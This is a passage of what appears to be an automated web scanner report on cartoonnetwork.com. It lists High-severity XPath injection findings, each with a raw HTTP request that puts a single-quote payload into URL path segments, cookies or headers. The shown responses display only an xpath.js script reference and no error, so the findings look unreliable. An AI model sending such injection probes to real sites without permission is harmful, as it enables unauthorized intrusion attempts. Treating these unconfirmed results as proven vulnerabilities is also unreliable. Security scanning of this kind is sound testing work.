HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:26 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.11. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnvideosvc2'/svc/episodeSearch/getEpisodesByCategory?networkName=HOME&id=multiCat&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:40 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.12. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByShow

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cnvideosvc2'/svc/episodeSearch/getEpisodesByShow?networkName=HOME&id=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:24 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.13. http://www.cartoonnetwork.com/feedback/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /feedback/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /feedback'/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:22 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.14. http://www.cartoonnetwork.com/feedback/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /feedback/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /feedback/index.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:24 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.15. http://www.cartoonnetwork.com/forums [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A21D99A1D0351E60713F6AFBFB646781; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.16. http://www.cartoonnetwork.com/forums [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2A039D727F538380EDF37E63623E5AD9; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.17. http://www.cartoonnetwork.com/forums [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums' HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:45:38 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.18. http://www.cartoonnetwork.com/forums [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=5F950DCB817B492554F222D80A85A79B; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive2; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.19. http://www.cartoonnetwork.com/forums [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=800FA9B518EB08EBE36237034CF885DB; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive2; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.20. http://www.cartoonnetwork.com/forums [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&'; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=EA57B1B966AFC6B9A6E17C71DA9B13E5; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive4; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.21. http://www.cartoonnetwork.com/forums [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true'; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=3C4E5BE285C06E81A139A1D3140DE660; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.22. http://www.cartoonnetwork.com/forums [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=E195B7B3FE9D483E82ED25D23FF667F6; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.23. http://www.cartoonnetwork.com/forums [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4AA7A49B70B0AF592BA3049629E7DEF9; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.24. http://www.cartoonnetwork.com/forums [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA'

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=21C112C57C24F986D794D9D7440F4120; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive2; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.25. http://www.cartoonnetwork.com/forums [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
